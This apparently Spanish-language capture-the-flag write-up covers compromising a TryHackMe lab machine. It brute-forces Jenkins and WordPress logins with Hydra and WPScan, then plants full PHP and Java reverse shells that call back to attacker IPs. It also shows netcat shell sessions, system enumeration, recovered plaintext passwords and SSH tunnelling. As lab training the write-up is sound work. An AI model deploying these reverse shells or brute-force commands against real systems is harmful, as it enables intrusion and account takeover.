  [ATTEMPT] target localhost - login "admin" - pass "kisses" - 180 of 14344399 [child 11] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "manuel" - 181 of 14344399 [child 1] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "myspace" - 182 of 14344399 [child 9] (0/0)
  [8083][http-post-form] host: localhost   login: admin   password: spongebob
  1 of 1 target successfully completed, 1 valid password found
  Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-28 17:50:20

  

  sacandolarequestdelloginvemoslarutaquesolicitaparaelenviodelosdatospostcontooldesarroyador

  

  sacandolaelpayloadrequestdelloginvemoslarutaquesolicitaparaelenviodelosdatospostcontooldesarroyador

  

  loguedejenkinsexitosoconpasswdencontradoconhydra

  

  encontramosenelpaneljenkinsuningresodecomandosyhacemosunapruebaparaveryfunciono

  • CONCLUSION: TUVIMOS PROBLES PROBLEMAS A LA HORA DE INTERSEPTAR LA SOLICIITUD REQUEST CON BURPSUITE, WIRESHARK, TSHARK, Y TCPDUMP (calculo por la tunelizacion tendria que configurard e otra forma el proxy), POR LO TANTO CONSEGUIIMOSLA REQUEST A TRAVES DE LAS HERRAMIENTAS DE DESARROLLADOR DEL BROWSER y LAS USAMOS CON EL COMANDO DE HYDRA, Y BINGO PARECE QUE CON EL USUARIO ADMIN TAMBIEN TENEMOS INGRESO Y CONSEGUIMOS EL PASSWD DEL PANEL DE JENKINS QUE CORRE LOCALMENTE EN LA MAQUINA INSTERNAL Y LO ESTAMOS VIENDO POR LA TUNELIZACION, ESTAS SON LAS CREDENCIALES: host: localhost login: admin password: spongebob Y CONSEGUIMOS INGRESAR AL PANEL DE JENKINS (Jenkins 2.250) CON EXITO PAPA.!!

• WPSCAN👈 --------------------------------->https://wpscan.com/register/

  wpscan --url http://internal.thm/blog/wp-login.php --usernames admin --passwords 
  /usr/share/wordlists/rockyou.txt
  _______________________________________________________________
       __          _______   _____
       \ \        / /  __ \ / ____|
        \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
         \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
          \  /\  /  | |     ____) | (__| (_| | | | |
           \/  \/   |_|    |_____/ \___|\__,_|_| |_|
  
       WordPress Security Scanner by the WPScan Team
                       Version 3.8.22
     Sponsored by Automattic - https://automattic.com/
     @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    _______________________________________________________________
  
  [+] URL: http://internal.thm/blog/wp-login.php/ [10.10.252.207]
  [+] Started: Tue Feb 27 23:49:19 2024
  
  Interesting Finding(s):
  
  [+] Headers
   | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
   | Found By: Headers (Passive Detection)
   | Confidence: 100%
  
  [+] WordPress readme found: http://internal.thm/blog/wp-login.php/readme.html
   | Found By: Direct Access (Aggressive Detection)
   | Confidence: 100%
  
  [+] This site seems to be a multisite
   | Found By: Direct Access (Aggressive Detection)
   | Confidence: 100%
   | Reference: http://codex.wordpress.org/Glossary#Multisite
  
  [+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-login.php/wp-cron.php
   | Found By: Direct Access (Aggressive Detection)
   | Confidence: 60%
   | References:
   |  - https://www.iplocation.net/defend-wordpress-from-ddos
   |  - https://github.com/wpscanteam/wpscan/issues/1299
  
  [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
   | Found By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
   |  - http://internal.thm/blog/wp-includes/css/dashicons.min.css?ver=5.4.2
   | Confirmed By:
   |  Common Wp Includes Query Parameter In Homepage (Passive Detection)
   |   - http://internal.thm/blog/wp-includes/css/buttons.min.css?ver=5.4.2
   |   - http://internal.thm/blog/wp-includes/js/wp-util.min.js?ver=5.4.2
   |  Query Parameter In Install Page (Aggressive Detection)
   |   - http://internal.thm/blog/wp-includes/css/dashicons.min.css?ver=5.4.2
   |   - http://internal.thm/blog/wp-includes/css/buttons.min.css?ver=5.4.2
   |   - http://internal.thm/blog/wp-admin/css/forms.min.css?ver=5.4.2
   |   - http://internal.thm/blog/wp-admin/css/l10n.min.css?ver=5.4.2
  
  [i] The main theme could not be detected.
  
  [+] Enumerating All Plugins (via Passive Methods)
  
  [i] No plugins Found.
  
  [+] Enumerating Config Backups (via Passive and Aggressive Methods)
   Checking Config Backups - Time: 00:00:02 <=================================================> (137 / 137) 
   100.00% Time: 00:00:02
  
  [i] No Config Backups Found.
  
  [+] Performing password attack on Wp Login against 1 user/s
  [SUCCESS] - admin / my2boys                                                                                                     
  Trying admin / lizzy Time: 00:00:46 <                                                  > (3885 / 14348277)  
  0.02%  ETA: ??:??:??
  
  [!] Valid Combinations Found:
   | Username: admin, Password: my2boys
  
  [!] No WPScan API Token given, as a result vulnerability data has not been output.
  [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
  
  [+] Finished: Tue Feb 27 23:50:14 2024
  [+] Requests Done: 4204
  [+] Cached Requests: 4
  [+] Data Sent: 1.477 MB
  [+] Data Received: 20.56 MB
  [+] Memory used: 231.629 MB
  [+] Elapsed time: 00:00:54
  
  

  

  paneladminworpressINTERNAL

  

  panelusuariosvemosmaildeuseradminINTERNAL

  

  paneladminaaparentecredencialespordefectopaaramailenservicioipop3INTERNAL

  

  vemosposibleentradaparaagregarreverseshellenelscriptdelsitioblog

  • CONCLUSION: BINGO VIMOS QUE WPSCAN TINE OPCION DE REALIZAR FUERZA BRUTA A LOGINNS DE WORPRESS, LO HICIMOS CON EL USUARIOO ADMIN; Y NOS DIO UNAS CREDENCIALES, SE TENZO: Username: admin, Password: my2boys, luego buscando algun metodo de entrada de scriprt o subidad e archivos para traar de lograr cargar un payload para un areverseshell vemos que podemos editar en THEME (http://internal.thm/blog/wp-admin/theme-editor.php?file=front-page.php&theme=twentyseventeen) el index.php principal del sitio veremos de cargar nuestra carga util aqui y hacer un llamado a la URL luego para ver siu pòdemos escuchar la reverse shell con nuestro netcat.

---

---

🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧

🛠️ SCRIPT DE EXPLOIT Y PAYLOADS ✔️

SCRIPT DE EXPLOIT Y PAYLOADS

• HACKTOOL👈 --------------------------------->https://www.paimon.com.ar/

  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
  
  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '10.10.95.35';  // You have changed this
  $port = 4444;  // And this
  $chunk_size = 1400;
  $write_a = null;
  $error_a = null;
  $shell = 'uname -a; w; id; /bin/sh -i';
  $daemon = 0;
  $debug = 0;
  
  //
  // Daemonise ourself if possible to avoid zombies later
  //
  
  // pcntl_fork is hardly ever available, but will allow us to daemonise
  // our php process and avoid zombies.  Worth a try...
  if (function_exists('pcntl_fork')) {
  // Fork and have the parent process exit
  $pid = pcntl_fork();
  
  if ($pid == -1) {
    printit("ERROR: Can't fork");
    exit(1);
  }
  
  if ($pid) {
    exit(0);  // Parent exits
  }
  
  // Make the current process a session leader
  // Will only succeed if we forked
  if (posix_setsid() == -1) {
    printit("Error: Can't setsid()");
    exit(1);
  }
  
  $daemon = 1;
  } else {
  printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  }
  
  // Change to a safe directory
  chdir("/");
  
  // Remove any umask we inherited
  umask(0);
  
  //
  // Do the reverse shell...
  //
  
  // Open reverse connection
  $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  if (!$sock) {
  printit("$errstr ($errno)");
  exit(1);
  }
  
  // Spawn shell process
  $descriptorspec = array(
  0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
  1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
  2 => array("pipe", "w")   // stderr is a pipe that the child will write to
  );
  
  $process = proc_open($shell, $descriptorspec, $pipes);
  
  if (!is_resource($process)) {
  printit("ERROR: Can't spawn shell");
  exit(1);
  }
  
  // Set everything to non-blocking
  // Reason: Occsionally reads will block, even though stream_select tells us they won't
  stream_set_blocking($pipes[0], 0);
  stream_set_blocking($pipes[1], 0);
  stream_set_blocking($pipes[2], 0);
  stream_set_blocking($sock, 0);
  
  printit("Successfully opened reverse shell to $ip:$port");
  
  while (1) {
  // Check for end of TCP connection
  if (feof($sock)) {
    printit("ERROR: Shell connection terminated");
    break;
  }
  
  // Check for end of STDOUT
  if (feof($pipes[1])) {
    printit("ERROR: Shell process terminated");
    break;
  }
  
  // Wait until a command is end down $sock, or some
  // command output is available on STDOUT or STDERR
  $read_a = array($sock, $pipes[1], $pipes[2]);
  $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  
  // If we can read from the TCP socket, send
  // data to process's STDIN
  if (in_array($sock, $read_a)) {
    if ($debug) printit("SOCK READ");
    $input = fread($sock, $chunk_size);
    if ($debug) printit("SOCK: $input");
    fwrite($pipes[0], $input);
  }
  
  // If we can read from the process's STDOUT
  // send data down tcp connection
  if (in_array($pipes[1], $read_a)) {
    if ($debug) printit("STDOUT READ");
    $input = fread($pipes[1], $chunk_size);
    if ($debug) printit("STDOUT: $input");
    fwrite($sock, $input);
  }
  
  // If we can read from the process's STDERR
  // send data down tcp connection
  if (in_array($pipes[2], $read_a)) {
    if ($debug) printit("STDERR READ");
    $input = fread($pipes[2], $chunk_size);
    if ($debug) printit("STDERR: $input");
    fwrite($sock, $input);
  }
  }
  
  fclose($sock);
  fclose($pipes[0]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  proc_close($process);
  
  // Like print, but does nothing if we've daemonised ourself
  // (I can't figure out how to redirect STDOUT like a proper daemon)
  function printit ($string) {
  if (!$daemon) {
    print "$string
  ";
  }
  }

  • CONCLUSION: NOSCREAMOS RAPIDO ESTA REVERSE SHELL DE PHP CON HACKTOOL Y LA PEGAMOS DENTRO DEL HTML SCRIPT DEL HOMPAGE DEL SITIO WEB INTERNAL Y LLAMAMOS A LA URL OBTENIENDO LA REVERSE SHELL, TENZANDOCE LA COSA.

• GPT SCRIPT CONSOLA JENKINS👈 --------------------------------->https://www.paimon.com.ar/

  def comando = 'whoami'
  def proceso = comando.execute()
  proceso.waitFor()
  
  def salida = proceso.text
  println("Resultado de 'ls':")
  println(salida)
  

  • CONCLUSION:

• GITHUB BUSQUEDA SCRIPT REVERSE SHELL👈 --------------------------------->https://www.paimon.com.ar/

  
  String host = "10.10.132.103";
  int port = 4444;
  String cmd = "/bin/bash"; // Cambiar cmd.exe por /bin/bash para Linux
  Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
  Socket s = new Socket(host, port);
  InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
  OutputStream po = p.getOutputStream(), so = s.getOutputStream();
  while (!s.isClosed()) {
      while (pi.available() > 0) so.write(pi.read());
      while (pe.available() > 0) so.write(pe.read());
      while (si.available() > 0) po.write(si.read());
      so.flush();
      po.flush();
      Thread.sleep(50);
      try {
          p.exitValue();
          break;
      } catch (Exception e) {}
  }
  p.destroy();
  s.close();

  

  scriptdereverseshellengroovyparalaterminaldejenkinsyconseguimoslareverseshell

  • CONCLUSION: CONSEGUIMOS UN SCRIPT QUE MODIFICAMOS LA SHELL , NUESTRA IP ATACANTE Y PUERTO POR DONDE ESCUCHAMOS CON NETCAT Y BINGO CONSEGUIMOS LA REVERSE SHELL.

---

---

🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥

🤯 EXPLOTACION ✔️

EXPLOTACION

• NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL

  ┌──(root㉿kali)-[~]
  └─# nc -lnvp 4444
  listening on [any] 4444 ...
  connect to [10.10.95.35] from (UNKNOWN) [10.10.252.207] 35178
  Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
   01:08:23 up  2:56,  0 users,  load average: 0.00, 0.00, 0.00
  USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  /bin/sh: 0: can't access tty; job control turned off
  $ whoami
  www-data
  $ hostname
  internal
  $ cat /proc/version
  Linux version 4.15.0-112-generic (buildd@lcy01-amd64-027) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) 
  #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020
  $ cat /etc/issue
  Ubuntu 18.04.4 LTS \n \l
  $ cd home
  $ ls
  aubreanna
  $ cd aubreanna
  /bin/sh: 14: cd: can't cd to aubreanna
  $ ls aubreanna
  ls: cannot open directory 'aubreanna': Permission denied
  $ cat /etc/passwd
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/usr/sbin/nologin
  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
  systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
  syslog:x:102:106::/home/syslog:/usr/sbin/nologin
  messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
  _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
  lxd:x:105:65534::/var/lib/lxd/:/bin/false
  uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
  dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
  landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
  pollinate:x:109:1::/var/cache/pollinate:/bin/false
  sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
  aubreanna:x:1000:1000:aubreanna:/home/aubreanna:/bin/bash
  mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
  $ echo $PATH
  /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
  
  $ ip route
  default via 10.10.0.1 dev eth0 proto dhcp src 10.10.252.207 metric 100 
  10.10.0.0/16 dev eth0 proto kernel scope link src 10.10.252.207 
  10.10.0.1 dev eth0 proto dhcp scope link src 10.10.252.207 metric 100 
  172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 
  
  $ netstat -ano
  Active Internet connections (servers and established)
  Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
  tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)
  tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
  tcp        0      0 127.0.0.1:37911         0.0.0.0:*               LISTEN      off (0.00/0/0)
  tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
  tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      off (0.00/0/0)
  tcp        0      0 10.10.252.207:35178     10.10.95.35:4444        ESTABLISHED off (0.00/0/0)
  tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
  tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
  tcp6       0      0 10.10.252.207:80        10.10.95.35:54640       TIME_WAIT   timewait (25.33/0/0)
  tcp6       0      0 10.10.252.207:80        10.10.95.35:59954       ESTABLISHED keepalive (5680.64/0/0)
  udp        0      0 127.0.0.53:53           0.0.0.0:*                           off (0.00/0/0)
  udp        0      0 10.10.252.207:68        0.0.0.0:*                           off (0.00/0/0)
  raw6       0      0 :::58                   :::*                    7           off (0.00/0/0)
  
  $ curl http://localhost:8080
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                               Dload  Upload   Total   Spent    Left  Speed
  100   793  100   793<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2F'/>    
  <script>window.location.replace('/login?from=%2F');</script></head><body style='background-color:white; 
  color:white;'>
  
  
  Authentication required
  <!--
  You are authenticated as: anonymous
  Groups that you are in:
    
  Permission you need to have (but didn't): hudson.model.Hudson.Read
   ... which is implied by: hudson.security.Permission.GenericRead
   ... which is implied by: hudson.model.Hudson.Administer
  -->
  
  </body></html> 
  
  $ find / -writable -type d 2>/dev/null
  /proc/2830/task/2830/fd
  /proc/2830/fd
  /proc/2830/map_files
  /run/screen
  /run/lock
  /run/lock/apache2
  /dev/mqueue
  /dev/shm
  /tmp
  /var/tmp
  /var/cache/tcpdf
  /var/cache/apache2/mod_cache_disk
  /var/www/html/wordpress/wp-content/themes/twentytwenty/template-parts
  /var/www/html/wordpress/wp-content/themes/twentytwenty/inc
  /var/www/html/wordpress/wp-content/themes/twentytwenty/classes
  /var/www/html/wordpress/wp-content/themes/twentytwenty/templates
  /var/www/html/wordpress/wp-content/themes/twentytwenty/assets
  /var/www/html/wordpress/wp-content/themes/twentyseventeen/template-parts
  /var/www/html/wordpress/wp-content/themes/twentyseventeen/inc
  /var/www/html/wordpress/wp-content/themes/twentyseventeen/assets
  /var/crash
  /var/lib/wordpress/wp-content
  /var/lib/wordpress/wp-content/themes
  /var/lib/lxcfs/proc
  /var/lib/lxcfs/cgroup
  /var/lib/php/sessions
  /var/lib/phpmyadmin/tmp
  
  $ find / -perm -u=s -type f 2>/dev/null
  /snap/core/9665/bin/mount
  /snap/core/9665/bin/ping
  /snap/core/9665/bin/ping6
  /snap/core/9665/bin/su
  /snap/core/9665/bin/umount
  /snap/core/9665/usr/bin/chfn
  /snap/core/9665/usr/bin/chsh
  /snap/core/9665/usr/bin/gpasswd
  /snap/core/9665/usr/bin/newgrp
  /snap/core/9665/usr/bin/passwd
  /snap/core/9665/usr/bin/sudo
  /snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
  /snap/core/9665/usr/lib/openssh/ssh-keysign
  /snap/core/9665/usr/lib/snapd/snap-confine
  /snap/core/9665/usr/sbin/pppd
  /snap/core/8268/bin/mount
  /snap/core/8268/bin/ping
  /snap/core/8268/bin/ping6
  /snap/core/8268/bin/su
  /snap/core/8268/bin/umount
  /snap/core/8268/usr/bin/chfn
  /snap/core/8268/usr/bin/chsh
  /snap/core/8268/usr/bin/gpasswd
  /snap/core/8268/usr/bin/newgrp
  /snap/core/8268/usr/bin/passwd
  /snap/core/8268/usr/bin/sudo
  /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
  /snap/core/8268/usr/lib/openssh/ssh-keysign
  /snap/core/8268/usr/lib/snapd/snap-confine
  /snap/core/8268/usr/sbin/pppd
  /bin/mount
  /bin/umount
  /bin/ping
  /bin/fusermount
  /bin/su
  /usr/bin/traceroute6.iputils
  /usr/bin/gpasswd
  /usr/bin/newgrp
  /usr/bin/newuidmap
  /usr/bin/chfn
  /usr/bin/newgidmap
  /usr/bin/passwd
  /usr/bin/chsh
  /usr/bin/at
  /usr/bin/sudo
  /usr/bin/pkexec
  /usr/lib/eject/dmcrypt-get-device
  /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
  /usr/lib/policykit-1/polkit-agent-helper-1
  /usr/lib/snapd/snap-confine
  /usr/lib/openssh/ssh-keysign
  /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  
  $ ls -la mnt
  total 8
  drwxr-xr-x  2 root root 4096 Feb  3  2020 .
  drwxr-xr-x 24 root root 4096 Aug  3  2020 ..
  $ ls -la opt
  total 16
  drwxr-xr-x  3 root root 4096 Aug  3  2020 .
  drwxr-xr-x 24 root root 4096 Aug  3  2020 ..
  drwx--x--x  4 root root 4096 Aug  3  2020 containerd
  -rw-r--r--  1 root root  138 Aug  3  2020 wp-save.txt
  $ cat /opt/wp-save.txt
  Bill,
  
  Aubreanna needed these credentials for something later.  Let her know you have them and where they are.
  
  aubreanna:bubb13guM!@#123
  

  • CONCLUSION: BINGO OBTUVIMOS LA REVERSE SHELL DE INTERNAL EN WORDPRESS PERO COMO EL USUARIO WWW-DATA VAMOS A SEGUIR... EN TODA LA INFO ENUMERADA LLAMA LA ATENCION UNA INTERFACE DE DOCKER SOLO PARA TENER EN CUENTA, CON NETSTAT VIMOS SERVICIOS MONTADOS POR VARIOS PUERTOS SOLO NOS DEVOLVIO CON CURL ALGO DE UN POSIBLE LOGIN EL QUE ESTABA CORRIENDO EN SU LOCALHOST POR EL PUERTO 8080 POR EL MOMENTO NO PUDIMOS VER LA PAGINA DESDE MAQUINA ATACANTE. LUEGO ENUMERANDO Y VIENDO VARIIOIS DIRECTORIOS EN /OPT ENCONTRAMOS UN ARCHIVO LLAMADO WP-SAVE.TXT IMPORTANTE APARENTEMENTE Y VIMOS UN MENSAJE CON ESTAS CREDENCIALES DEL USUARIO AUBREANNA SE VA TENZANDO MAS LA COSA: aubreanna:bubb13guM!@#123 y LUEGO PROBAMOS CON ESTAS CREDENCIALES POR SSH Y BINGO YA ESTAMOS COMO AUBREANNA .

• NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL

  ┌──(root㉿kali)-[~]
  └─# nc -lnvp 4444
  listening on [any] 4444 ...
  connect to [10.10.132.103] from (UNKNOWN) [10.10.112.117] 40476
  ls
  bin
  boot
  dev
  etc
  home
  lib
  lib64
  media
  mnt
  opt
  proc
  root
  run
  sbin
  srv
  sys
  tmp
  usr
  var
  whoami
  jenkins
  ls home
  ls
  bin
  boot
  dev
  etc
  home
  lib
  lib64
  media
  mnt
  opt
  proc
  root
  run
  sbin
  srv
  sys
  tmp
  usr
  var
  ls root
  ls: cannot open directory 'root': Permission denied
  ls tmp
  hsperfdata_jenkins
  hsperfdata_root
  jetty-0_0_0_0-8080-war-_-any-2385313934447407628.dir
  jetty-0_0_0_0-8080-war-_-any-7115445266796347992.dir
  winstone4805797399595250733.jar
  winstone7166027169177973699.jar
  winstone949073167922835362.jar
  ls  opt
  note.txt
  cd opt
  ls
  note.txt
  cat note.txt
  Aubreanna,
  
  Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
  need access to the root user account.
  
  root:tr0ub13guM!@#123
  

  • CONCLUSION: PERFECTO LUEGO DE CONSEGUIR UNA REVERSE SHELL AHORA DESDE EL PANEL DE SCRIPT ADMIN DE JENKINS CONSEGUIMOS LA REVERSE SHELL Y ENNUMERANDO DIRECTORIOS VIMOS UN ARCHIVO NOTE.TXT EN EL DIRECTORIO /OPT DE NUEVO, Y ESTE TENIA APARENTEMENTE AHORA LAS CREDENCIALES DE ROOT PARA SSH Y SE TENZO DEL TODO SEGURO (root:tr0ub13guM!@#123).

• SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL

  ┌──(root㉿kali)-[~]
  └─# ssh aubreanna@10.10.252.207
  The authenticity of host '10.10.252.207 (10.10.252.207)' can't be established.
  ED25519 key fingerprint is SHA256:seRYczfyDrkweytt6CJT/aBCJZMIcvlYYrTgoGxeHs4.
  This key is not known by any other names
  Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  Warning: Permanently added '10.10.252.207' (ED25519) to the list of known hosts.
  aubreanna@10.10.252.207's password: 
  Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
  
   * Documentation:  https://help.ubuntu.com
   * Management:     https://landscape.canonical.com
   * Support:        https://ubuntu.com/advantage
  
    System information as of Wed Feb 28 02:04:32 UTC 2024
  
    System load:  0.0               Processes:              111
    Usage of /:   63.8% of 8.79GB   Users logged in:        0
    Memory usage: 46%               IP address for eth0:    10.10.252.207
    Swap usage:   0%                IP address for docker0: 172.17.0.1
  
    => There is 1 zombie process.
  
  
   * Canonical Livepatch is available for installation.
     - Reduce system reboots and improve kernel security. Activate at:
       https://ubuntu.com/livepatch
  
  0 packages can be updated.
  0 updates are security updates.
  
  
  Last login: Mon Aug  3 19:56:19 2020 from 10.6.2.56
  aubreanna@internal:~$ whoami
  aubreanna
  aubreanna@internal:~$ ls
  jenkins.txt  snap  user.txt
  aubreanna@internal:~$ cat user.txt
  THM{int3rna1_fl4g_1}
  
  aubreanna@internal:~$ cat jenkins.txt 
  Internal Jenkins service is running on 172.17.0.2:8080
  
  find / -type f -name *.txt 2>/dev/null
  /opt/wp-save.txt
  /boot/grub/gfxblacklist.txt
  /var/www/html/wordpress/license.txt
  /var/www/html/wordpress/wp-includes/images/crystal/license.txt
  /var/www/html/wordpress/wp-includes/ID3/readme.txt
  /var/www/html/wordpress/wp-includes/ID3/license.txt
  /var/www/html/wordpress/wp-includes/ID3/license.commercial.txt
  /var/www/html/wordpress/wp-includes/js/plupload/license.txt
  /var/www/html/wordpress/wp-includes/js/swfupload/license.txt
  /var/www/html/wordpress/wp-includes/js/tinymce/license.txt
  /var/www/html/wordpress/wp-content/plugins/akismet/readme.txt
  /var/www/html/wordpress/wp-content/plugins/akismet/changelog.txt
  /var/www/html/wordpress/wp-content/plugins/akismet/LICENSE.txt
  /var/www/html/wordpress/wp-content/themes/twentytwenty/readme.txt
  /var/www/html/wordpress/wp-content/themes/twentyseventeen/readme.txt
  /var/www/html/wordpress/wp-content/themes/twentynineteen/readme.txt
  /home/aubreanna/user.txt
  /home/aubreanna/jenkins.txt
  /usr/share/doc/phpmyadmin/html/_sources/require.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/developers.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/intro.txt
  /usr/share/doc/phpmyadmin/html/_sources/config.txt
  /usr/share/doc/phpmyadmin/html/_sources/setup.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/import_export.txt
  /usr/share/doc/phpmyadmin/html/_sources/user.txt
  /usr/share/doc/phpmyadmin/html/_sources/credits.txt
  /usr/share/doc/phpmyadmin/html/_sources/transformations.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/glossary.txt
  /usr/share/doc/phpmyadmin/html/_sources/intro.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/transformations.txt
  /usr/share/doc/phpmyadmin/html/_sources/privileges.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/config.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/user.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/copyright.txt
  /usr/share/doc/phpmyadmin/html/_sources/copyright.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/import_export.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/faq.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/require.txt
  /usr/share/doc/phpmyadmin/html/_sources/privileges.txt
  /usr/share/doc/phpmyadmin/html/_sources/other.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/index.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/vendors.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/glossary.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/setup.txt
  /usr/share/doc/phpmyadmin/html/_sources/credits.rst.txt
  /usr/share/doc/phpmyadmin/html/_sources/developers.txt
  /usr/share/doc/phpmyadmin/html/_sources/vendors.txt
  /usr/share/doc/phpmyadmin/html/_sources/other.txt
  /usr/share/doc/phpmyadmin/html/_sources/index.txt
  /usr/share/doc/phpmyadmin/html/_sources/faq.txt
  
  
  

  • CONCLUSION:PERFECTO PROBAMOS LAS CREDENCIALES DE AUBREANNA EN SSH Y ENTRO DE UNA, Y PUDIMOS LEER LA BANDERA, COMO TAMBIEN VIMOS LO QUE SOSPECHABAMOS DE UN SERVIDOR MONTADO POR EL PUERTO 8080 QUE NO SABIAMOS EL NOMBRE Y APARENTEMENTE CORRE JENKINS EN EL, EN SU LOCALHOST, PROFUNDISAREMOS EN ESTO. LUEGO VERIFICANDO LOS DIRECTORIOS EN /OPT CONSEGUIMOS SU BANDERA THM{int3rna1_fl4g_1} :D

• SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL

  ┌──(root㉿kali)-[~]
  └─# ssh -L 8082:localhost:8080 -N -f -l aubreanna 10.10.252.207
  aubreanna@10.10.252.207's password: 
  
  URL y ENTRAMOS AL LOGINS JENKINS :D  :
  http://localhost:8082/login?from=%2F

  

  luegodetunelizarconsshennuestramaquinaatacantevemoslogindejenkins

